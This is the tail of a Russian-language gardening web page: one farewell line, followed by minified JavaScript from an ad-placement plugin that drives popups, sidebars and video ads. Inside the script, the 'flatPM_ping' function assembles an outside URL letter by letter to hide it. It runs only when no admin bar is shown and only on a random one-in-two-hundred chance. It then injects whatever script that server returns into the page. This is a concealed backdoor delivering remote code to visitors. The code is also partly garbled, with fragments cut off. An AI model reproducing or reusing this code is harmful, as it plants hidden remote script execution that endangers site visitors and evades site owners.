Благодарю всех за внимание. Удачи всем на ваших замечательных дачках.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};